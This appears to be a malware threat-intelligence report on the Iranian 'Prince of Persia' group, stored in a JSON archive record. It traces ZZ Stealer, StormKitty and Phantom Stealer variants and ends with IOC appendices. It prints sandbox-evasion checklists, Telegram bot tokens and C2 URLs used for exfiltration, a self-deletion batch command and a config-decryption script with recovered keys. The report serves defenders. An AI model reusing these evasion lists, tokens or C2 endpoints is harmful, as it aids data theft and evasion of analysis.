We verified that this variant is similar; below is a summary of the analysis of the main functionality:\r\nThe malware first implements various anti-analysis checks. If it detects a risk, it will sleep for a random amount of time and then terminate itself:\r\n1. Machine name is not one of the known sandbox names:\r\nBUXF-O02J2Q,JACOCOOK,JOHN-PC,ABBY-PC,USER-PC,AZURE-PC,GREFRANKLI,LISA-PC\r\n2. User name is not one of the known sandbox user names:\r\nabby,IT-ADMIN,Paul Jones,WALKER,Sandbox,timmy,sandbox,sand box,maltest,malware,virus,JohnDoe,HAL9TH,John Doe,Emily,CurrentUser,test,george,Anna,ss\r\n3. File does not exist: %USERPROFILE%\\Pictures\\My Wallpaper.jpg\r\n4. Hosting / datacenter / cloud check (implemented but not used): an HTTP GET to “https://ip-api.com/line/?fields=hosting” must not return “True”\r\n5. Analysis tool processes are not running (not used):\r\nPythonw.exe,ollydbg.exe,processhacker.exe,tcpview.exe,autoruns.exe,de4dot.exe,ilspy.exe,dnspy.exe,autorunsc.exe,filemon.exe,procmon.exe,regmon.exe\r\n6. Sandbox and AV hooking DLLs are not present (not used): SbieDll.dll,SxIn.dll,Sf2.dll,snxhk.dll,cmdvrt32.dll\r\n7. Microsoft Hyper-V check: whether the MAC address begins with 00:15:5D:00:B2\r\nZZ Stealer appears to be a first-stage malware (like Foudre) that first collects environmental data, screenshots, and exfiltrates all desktop files. In addition, upon receiving the command “8==3” from the C2 server, it will download and execute the second-stage malware, also named 8==3 by the threat actor.\r\nA very similar strike-back attempt at a security researcher was documented in this Checkmarx article from the beginning of 2024. While the C2 server IP is different, the name of the PHP file is the same: upwawsfrg.php. 
The ZIP file that decodes the executable malware is also similar, using 0x33 instead of 0x44 as the XOR byte.\r\nBelow is a screenshot from the 2024 case, which is very similar to our Telegram group ZIP file. The file name follows a similar ZIP file format, \u003cuserName\u003e-\u003ccomputerName\u003e-\u003cdate\u003e.zip, and the body of the message has exactly the same format.\r\nWe were able to verify that the counter attack documented by Checkmarx is actually a previous version of ZZ Stealer. This variant, named “AB” by the threat actor, uses the exact same decryption key, IV and salt as our new “8==3” variant to decrypt its own configuration. It also uses the “8==3” C2 server commands that will be detailed in the next section.\r\nThe “AB” variant of ZZ Stealer downloads a second-stage encrypted binary from the C2 server using an HTTP GET request to zd=1 and uses a different AES key to decrypt it: ae$tcgtAcoRT8441. The second-stage malware is not StormKitty but an AB Metasploit-generated payload connecting to the C2 server 104.248.194.233 on port 443. However, we found two other AB variants that download and execute the Monkey variant of StormKitty.\r\nWe believe this is a strong indication of a link between Prince of Persia and the threat actor behind the targeting of open-source Python libraries documented by Checkmarx. Both used:\r\n1. The exact same counter-strike technique as a reaction to the same Telegram forward message attempt.\r\n2. The same tools and attack chain: a very similar ZIP file and a similar LNK file that uses a similar PowerShell script to drop the exact same variant of the ZZ Stealer malware.\r\n3. The same process in which ZZ Stealer downloads the second-stage malware using the same decryption key from a page with the exact same unique name and parameters. 
\r\nThe StormKitty 8==3 file downloaded and executed in memory by ZZ Stealer exfiltrates files to\r\nhttps://api.telegram.org/bot7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ/getchat?chat_id=1126217452\r\nThe group is still active and operated by a user named N3cro M4ncer. The bot exfiltrating victims’ files to the Telegram group is d00m3rz_bot.\r\nWe were able to forward the first message from the operator, sent on May 14, 2024. At first, we did not see any exfiltrated files. We executed the malware in our lab and in some public sandboxes and got the following exfiltrated files.\r\nEach report is an encrypted ZIP file; the filename is the hardware ID (HWID) of the victim’s machine. The content of the ZIP file is split into directories of exfiltrated data. For example, a report looks like this:\r\nBelow is the relevant function in the source code of ZZ Stealer that produces it. The only difference is that in ZZ Stealer the first line is “🙈 8==3 – Report*” instead of “😹 StormKitty- Report*”. 8==3 is a common ASCII-style emoticon used as a phallic symbol, and it is used in the ZZ Stealer code as a command from the C2 server.\r\nMoreover, the typelibguid is the same in both ZZ Stealer and StormKitty: a16abbb4-985b-4db2-a80c-21268b26c73d. In addition, the keylogger, banking, and crypto services are identical. 
Below is the screenshot of ZZ Stealer:\r\nAnd here are the exact same strings in the StormKitty stub:\r\n5BF4902802BCC524679C47555F85E230B55829CAEF5CD3777250F952A0F4C967\r\nLastly, both drop a .bat file for self-destruction:\r\nchcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah\r\nchcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah\r\nBoth are identical except for the current process ID, and ZZ Stealer deletes a single file:\r\nWe also found an older stub of StormKitty configured with the same Telegram group ID, uploaded to VirusTotal.com in October 2024 and created on May 14, 2024, which is exactly the date of the first message sent in the threat group chat.\r\nSha256: 4398063cd50c77b8d28f15c35b5948165b356f33dd7c4504eeac0c328fe97487\r\nWhen it was executed in the VirusTotal.com sandbox back in 2024, it produced the file 0BF9CBC365.zip (ae2005c3fe8ab3b96ab712c5543651431c25fa4f42f828e22bf3ae414cf663c1):\r\nOn January 17, 2026, we began capturing exfiltrated files from a new malware in the Telegram group 7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ:\r\nThe threat actor was rebranding the malware as Phantom Stealer v3.5.0.\r\nA website was referenced where the malware and crypter can be purchased. The website also includes a 14-minute video about how to set up the malware, including the IP of the attackers’ RDP server, 191.101.130.244, and Telegram messages.\r\nThis IP resolved to the same phantomsoftwares.site from February to March 2025 and is used as a host to download different malware files:\r\nPhantom Stealer shares a lot of source code with the StormKitty malware. 
The configuration is encrypted using the same AES encryption with this key and IV:\r\nIt also uses the same encryptor as Stealerium’s encryptor:\r\nPhantom Stealer was analyzed before in this Proofpoint article.\r\nThe mic2.txt file was downloaded by a VBScript from 191.101.130.244. The VBS decodes it from base64 and executes it.\r\nThis mic2.txt is also downloaded by the Remcos malware, which was found by Symantec and shown in this article to be used by APT33.\r\nAPT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.\r\nRemcos is not a self-developed tool and is widely used by different threat groups, but it may indicate one possible link between Prince of Persia and APT33 and serves as a second link to different Iranian threat groups.\r\nTrack Back to 2022\r\nThe older version of ZZ Stealer connected to the C2 server http://128.199.113.162/awautng.php and downloaded and executed StormKitty.\r\nThe request to http://128.199.113.162/stwittc/upwawsfrg.php is used to upload the captured screenshot.\r\nStormKitty connects to the same Telegram chat group ID 1126217452, commanded by the same operator N3cro M4ncer, but with a different bot named quakerz_bot. The API key is: bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY\r\nWe were able to capture more than 1000 messages, including 60 non-encrypted files, since 2021. 
The other files were sent to https://anonfiles.com, a third-party site that has not been available since July 2022.\r\nThe passwords of the encrypted ZIP files are sent via Telegram.\r\nIn August 2022, just after the first test message, it was rebranded as Monkey Report.\r\nThe Monkey variant is very similar to the 8==3 variant, with the main difference being that it is not protected by the Confuser obfuscator and the Telegram group and C2 are those of the older version. Here is the source code that generates it, decompiled from 29529eb346f6dad7815e604af1af3931d3c9c42db7ec0a1d90484713ce7089d7:\r\nSome of the messages were sent multiple times. We mapped 46 different victims from the US, UK, Germany, Nigeria, and more. The table below maps the victims based on their external IP addresses, with some victims having more than a single IP. See Appendix B for a list of the victim Hardware IDs.\r\nCountry  # of Victims by IP\r\nUnited States 22\r\nRussia 21\r\nGermany 18\r\nNigeria 5\r\nThe Netherlands 5\r\nSwitzerland 4\r\nCanada 3\r\nSingapore 3\r\nUnited Kingdom 3\r\nAustria 2\r\nIndia 2\r\nSouth Korea 2\r\nVietnam 2\r\nColombia 1\r\nCzechia 1\r\nFrance 1\r\nGhana 1\r\nIndonesia 1\r\nItaly 1\r\nJordan 1\r\nKosovo 1\r\nSenegal 1\r\nOn January 23, 2024, we received a message from a new builder named “Phemedrone Builder,” which is another C# infostealer similar to StormKitty. As seen in the analysis in this Splunk article, it commonly used 191.101.130.244 in 2024.\r\nOn February 18, 2024, the “Monkey report” was changed to our known “8==3 report”, meaning this was probably the first report exfiltrated by the StormKitty “8==3” malware version.\r\nIn March 2024, the chat group was spammed by the developer of a crypter, who tried to convince the threat actor to purchase it. 
The same message was sent thousands of times.\r\nThis probably caused the threat actor to move to the new bot and the new API key in May 2024.\r\nStormKitty Correlation with Other Public Infostealers\r\nA report by Uptycs from 2023 details another StormKitty stub named HookSpoofer RAT, which connects to a different Telegram group but uses the exact same decryption key and salt. The code is also the same, and two DLLs are downloaded at runtime from the StormKitty GitHub. The Telegram API is:\r\nhttps://api.telegram.org/bot6122846074:AAF6rJZMCIphpMPrSWQdU2PZSf14u6p4zeA/getchat?chat_id=-1001870471979\r\nAccording to the research above: “Misuse of open source stealers has become common, with StormKitty code being observed earlier in Typhon, WorldWind stealer, and Prynt Stealer malware.”\r\nAnother research report from Zscaler correlated DarkEye and AsyncRAT to the StormKitty code. We found that the DarkEye emoji is the same emoji used by the Prince of Persia threat actor as well. We even found research from 2020 on a very similar malware named Stealerium, which uses Discord instead of Telegram. There is also a possible connection to the Snake Keylogger, which exfiltrates the files in a similar way.\r\nThe text is identical except for “PW” instead of “Log”, and the extension is .html.exe instead of .zip.\r\nhttps://x.com/g0njxa/status/1825836948092596572\r\nTo conclude, the usage of StormKitty and other popular infostealer variants is widespread and has weak correlation to Prince of Persia. 
According to this Bitsight article, infostealer attribution for Worldwind comes in third place and Prynt is in the top 10:\r\nSource: Bitsight Research titled “Exfiltration over Telegram Bots: Skidding Infostealer Logs”\r\nBut the most interesting correlation was found when we dug deeper into the ZIP/LNK infection instead of the final stub malware. We found a possible link to “Educated Manticore,” an Iranian threat group targeting Iraq and Israel documented in this Check Point article.\r\nThe LNK file 0f4d309f0145324a6867108bb04a8d5d292e7939223d6d63f44e21a1ce45ce4e mentioned in this report, with the PowerShell script that decodes the executable, is almost identical to our LNK file, except that 0x77 is used as the XOR key instead of 0x33/0x44. It was also extracted from a ZIP file that is similar to our malicious ZIP file, but the finalAgent.exe is different from our ZZ Stealer.\r\nConclusion\r\nOur ongoing research campaign into the prolific and elusive group known as Prince of Persia has highlighted critical details about their activities from December 18, 2025—when Part I of our research was published—to January 8, 2026, when the Iranian government imposed a country-wide internet blackout and the group was temporarily inactive. We detected renewed activity on January 26 as they began preparing new C2 servers. This led us to predict that the Iranian regime would soon end the internet blackout, which came to fruition one day later on January 27. We believe this provides solid proof that Prince of Persia is a state-sponsored threat actor operated by the Iranian regime and that we have the ability to predict its future actions using the visibility we have established into their cyber operations.\r\nBy sharing our research publicly, we hope to help other cybersecurity professionals better understand the associated risks and IOCs of this group. 
Towards this end, we recommend that organizations take the following steps to protect themselves against the techniques used by Prince of Persia:\r\nEnsure their security controls are updated to protect against the IoCs provided in Appendix B\r\nMonitor for any unusual Telegram traffic\r\nEnsure their operating systems are fully updated\r\nFor more in-depth information about this research, please:\r\nContact your customer success representative if you are a current SafeBreach customer\r\nSchedule a one-on-one discussion with a SafeBreach expert\r\nContact Kesselring PR for media inquiries\r\nAbout the Researcher\r\nTomer Bar brings over 20 years of cybersecurity research experience to this position, including work in the areas of advanced persistent threat (APT) groups, vulnerabilities, reverse engineering, and forensics. As a hands-on security researcher and head of the SafeBreach Labs team, Bar has discovered multiple vulnerabilities in the Windows operating system. His contributions have earned him recognition as one of Microsoft’s 2023 Most Valuable Security Researchers and a nomination for Best Privilege Escalation Vulnerability at the 2021 Pwnie Awards. Tomer holds a Master’s degree from Bar Ilan University. He is a frequent public speaker, presenting his research at events worldwide, including DEF CON (28-31), Black Hat USA, Black Hat Asia, etc. 
He is also a member of the Black Hat Europe review board, where he leads the malware track talks.\r\nAppendix A: ZZ Stealer Decryption Script\r\nimport base64\r\nimport argparse\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Protocol.KDF import PBKDF2\r\nfrom Crypto.Hash import SHA1\r\n\r\n\r\ndef getKey(password, salt):\r\n    # Derive the 32-byte AES key with PBKDF2-HMAC-SHA1, 1000 iterations, as the stub does\r\n    key = PBKDF2(password, salt, dkLen=32, count=1000, hmac_hash_module=SHA1)\r\n    return key\r\n\r\n\r\ndef decrypt_string(encrypted_base64: str, password: bytes, salt: bytes, iv: bytes) -\u003e str:\r\n    # Base64-decode the embedded string, AES-CBC decrypt it and strip the zero padding\r\n    encrypted = base64.b64decode(encrypted_base64)\r\n    key = getKey(password, salt)\r\n    cipher = AES.new(key, AES.MODE_CBC, iv)\r\n    decrypted = cipher.decrypt(encrypted)\r\n    return decrypted.rstrip(b\"\\x00\").decode(\"utf-8\")\r\n\r\n\r\ndef main():\r\n    # Hard-coded password, salt and IV recovered from the ZZ Stealer sample\r\n    password = b\"Q3eLgimpA\"\r\n    salt = b\"dftfun%^a\"\r\n    iv = b\"$5fysp84AzCpnUZA\"\r\n    parser = argparse.ArgumentParser(description=\"decrypt Base64 encrypted input from command line or file\")\r\n    group = parser.add_mutually_exclusive_group(required=True)\r\n    group.add_argument(\"--single_b64\", help=\"Single Base64 encrypted string\")\r\n    group.add_argument(\"--file_of_b64\", help=\"File containing Base64 encrypted strings, one per line\")\r\n    args = parser.parse_args()\r\n    if args.single_b64:\r\n        b64_values = [args.single_b64]\r\n    else:\r\n        with open(args.file_of_b64, \"r\") as f:\r\n            b64_values = f.readlines()\r\n    for b64_value in b64_values:\r\n        encrypted_base64 = b64_value.strip()\r\n        if not encrypted_base64:\r\n            continue  # skip blank lines in the input file\r\n        print(\"%s,%s\" % (decrypt_string(encrypted_base64, password, salt, iv), encrypted_base64))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n
Appendix B: IOCs – Malware Hashes\r\nTornado v51 Winrar Exploit rar file\r\n44fc9e306763774b50b61fc7487aa1d219aa288aefa201119c7bc278e17600a8\r\nTornado v51 SFX file\r\n5db4ed7d07ab028ab6ceba8efec5f667d86a419020d2a8c86e90a3125aa31bb9\r\nTornado v51 main dll – file name: AuthFWSnapin.dll\r\n8DB20544F280955ED3EF3C42DC8423E3000E244FC7C8F0E3A7567FA48F7A15D9\r\nTornado installer dll: reg7989.dll, sha256\r\nB937024B7484B26D09BA8130CC4AB04600DC18C976BB0C7724A063F1FC6F0D77\r\nTornado = Foudre v51 C2 Servers\r\nActive C2 Server: 45.80.148.249\r\nActive Dates: Since December 24, 2025, for Foudre\r\nDomain names:\r\nNon-active C2 Server: 45.80.148.195\r\nActive Dates: between October 12, 2025, for Tornado/Foudre\r\nTornado Telegram Chat\r\nhttps://api.telegram.org/bot7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM/getChatMember?user_id=874675833\u0026chat_id=874675833\r\nTornado Public Key\r\nTgpMb2NrQm94MwEAAAADAAEAAFeitSHwMCpWaei85UCzNfaaxbdwLSOSKmd1iTYoYjkRWSokNDcBwld0uuzfr6MpeIpMH/X7ZbzMwjYi8X5\r\nTonnerre v14 exe\r\nCB6ED0DD5DBC2E34AE36DD22B9522F7EEC94BBFDA2DCDA7425736656279F8CDF\r\nTonnerre v15 exe\r\n30C20ADA243B7E476E006DEC94876BDEECE4F8ACA12A4CB6CF962C80F1A6EE3C\r\nTonnerre v17 exe\r\nD9DFC8A8E3E259A517A91E2E91E3A1D6EF1D5B0886E6729BF897D6EF1B2DE722\r\nFoudre SFX v34\r\nFoudre v34 dll – imphash 57447c4c35a807b252b9ba3c17de230f\r\nFoudre v34 Loaders\r\nconf8830.dll\r\nd3d8b79f86f152338aabeadfaf35ba2e43f82aa4bfa29ff70b59702b455fa6a6\r\nFoudre Office Infection\r\n15dd41ec1bdaabb741e8cc6481e0a98831798ac4e93c2513cdbd00c51241ffb7\r\n52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9\r\nTonnerre v17 SFX\r\nC8583FDDF668808E31F993FF6BCFC6F8BA8B4C2C0C4EA51D4CCC6F5D311B6C90\r\nMaxPinner v5\r\nTel jam shid.exe – uploaded to VirusTotal on 13/6/21 – creation probably 16/8/18\r\n34692cabe9e9ba584ec2b8947a7aad4f787d10a3da56886e52d05d0675fe7b01\r\nFixed FTP server – ttdl3.dynu.net probably resolved to 178.33.49.126\r\nMaxPinner v8\r\n5AD83F9FAD87273593F9DF73761DE211A704E6E10984FDE113A6435CC83C1E58\r\nSFX – 04844b5e15750467224c29b6fe5806e4093cd1d0ee4904dccf96831947574c85\r\nAmaq Finder\r\nB9741ad9ac084fb43804618acabe637f6b097bf72264b3335514678b2d0da785 – Amaq Finder Version 1.0 – 2017-07-19\r\nA107635083212c662dbb3b69951e0de7b3d3894d8bcd7cfff545d119f81aeb1f – AmaqFinder1.rar\r\nAmaq Finder v1.7\r\n23761caf7f4c6d7b3b4608c59729eb807c961deaa23aac94db5289b9b9739864\r\n09a2f03b5d54b48ba5f0df9ea57a6c20ba6fa90ad0f334132ea1da9320fbfbfd\r\na8565b678857129158904760ffe468e3ea6e4cf8a63a6c16b97e5717b1e8a384\r\namfkey01.key\r\nDE94830B9B4DF6867B7D2888ACCA9F3D0C103933B01721C04E6BD6492BDE9E58\r\nDeep Freeze Version\r\n55d60bcf83c81fff25ca413dc2f720a671f522d79cc13b6d618f7f25094acd62\r\nB1a16dd0500c570fb44cd13b68737fcd18710072559f810f3b3691ca93787cff\r\n39cdff475bb6d03e56d047b0d00b352c2c61b4d3a3c7b7b06262bf84e481dee9\r\nFoudre v34 checks Internet connectivity and gets the current date from:\r\nhttp://worldtimeapi.org/api/timezone/GMT\r\nAmaq Finder checks Internet connectivity and gets the current date from: http://www.cnbc.com/id/100727362/device/rss\r\nTornado checks the same using:\r\nhttps://timeapi.io/api/time/current/zone?timeZone=UTC\r\nZIP files containing the PowerShell that decodes the ZZ Stealer executable\r\nEnrich-ASUS-2025-10-13 08-30.zip\r\nC1896C20E1E397F8C59DBEAEF37CC765D401C8F6D933B140BE774F0FBF118EF4\r\nVladimir-WIN11-2025-10-29 08-44.zip\r\n8abfe36182573e1ba1e6e0d227d60d83002191b7e30a88064c073814b0baf318\r\nOlder versions than 3.81\r\nOng.zip\r\n2312e7f362650f642a1c6319817219ca85100bdbfa07d4c0a54212e507d4970b\r\nJoris-ASUS1337.zip\r\nda6dd7f8cf4460ca1364ab18a74160ad49a28e412c05a41fbffbf6c93452dcd7\r\nZZ Stealer Executable\r\nVersion 3.81 – netguid:3d71ab44-80ca-4748-8d45-5ad49d1cb242\r\nVersion 3.82 – netguid:71f70dc5-37d1-4ddb-acb0-a942aa2ad623\r\nACD7308C4C250B0740418A2175CA804EF8E26A7E5C96474A3F84320D31ABE45C\r\nA6EB64BF9C52FED2EB043E94BC9FA69A1EA836DAE82EA1E87E55A9E4828F1E38\r\nZZ Stealer AB version\r\nAB Metasploit payload and C2\r\n4EDF2A61C1A4AF58990FE72A746D9B810CD173DDB40BAF56231A580095B6C252\r\n7e0b5396f1f00177e19b7887137dcc314dccee09f5855c1b6a60129c65310a24\r\n9236d5d27fdf34bc757a0aae3b4d3e1446282b8f38d9ff700702fad16c8e7ec9\r\n104.248.194.233:443\r\nStormKitty (8==3 version)\r\n4398063cd50c77b8d28f15c35b5948165b356f33dd7c4504eeac0c328fe97487\r\nF1cdf63ba69eeed3ddc0a353af01843a91dd80dd0fba07940604062da0fed511\r\nStormKitty (Monkey version, no ConfuserEx)\r\n29529eb346f6dad7815e604af1af3931d3c9c42db7ec0a1d90484713ce7089d7\r\nStormKitty C2 and Telegram group\r\nhttps://api.telegram.org/bot7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ/getchat?chat_id=1126217452\r\nOlder versions than 3.81\r\nhttp://128.199.113.162/XtfcshEgt/upwawsfrg.php\r\nhttp://128.199.113.162/stwittc/upwawsfrg.php\r\nhttp://128.199.113.162/awautng.php\r\nhttp://128.199.113.162/zawautng.php\r\nCurrent live C2\r\nhttp://209.38.92.52/RdstgcDe/upwawsfrg.php\r\nHWIDs of victims\r\nPossible APT33 related\r\nVBS\r\n2c202cd79bfd44e8f474d58df02d4882b5c45c2c06fba1adb5e488d41ca47f04\r\nRemcos\r\n75900c975601b657f881164daddb4bc8e8b723883c2b7a4ac0ff91f25a8397ad\r\nPhantom Stealer source code zip (builder and stub)\r\n090b78e9d935867ad357f5a6a028b88ff16847271d88aeb63ba22c65a947b0ac\r\nSource: https://www.safebreach.com/blog/prince-of-persia-part-ii/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.safebreach.com/blog/prince-of-persia-part-ii/"
	],
	"report_names": [
		"prince-of-persia-part-ii"
	],
	"threat_actors": [
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33 ",
				"Elfin ",
				"HOLMIUM ",
				"MAGNALIUM ",
				"Peach Sandstorm ",
				"Refined Kitten ",
				"TA451 "
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1",
			"created_at": "2023-01-06T13:46:38.561288Z",
			"updated_at": "2026-04-10T02:00:03.024326Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"Operation Mermaid",
				"Prince of Persia",
				"Foudre"
			],
			"source_name": "MISPGALAXY:Infy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1efe328c-7bda-49d8-82bf-852d220110ae",
			"created_at": "2026-01-22T02:00:03.661882Z",
			"updated_at": "2026-04-10T02:00:03.917703Z",
			"deleted_at": null,
			"main_name": "Educated Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Educated Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39",
			"created_at": "2022-10-25T16:07:23.734244Z",
			"updated_at": "2026-04-10T02:00:04.731031Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"APT-C-07",
				"Infy",
				"Operation Mermaid",
				"Prince of Persia"
			],
			"source_name": "ETDA:Infy",
			"tools": [
				"Foudre",
				"Infy",
				"Tonnerre"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439139,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.pdf",
		"text": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.txt",
		"img": "https://archive.orkl.eu/0320483934aa386688f962f27c809fb89ac15f87.jpg"
	}
}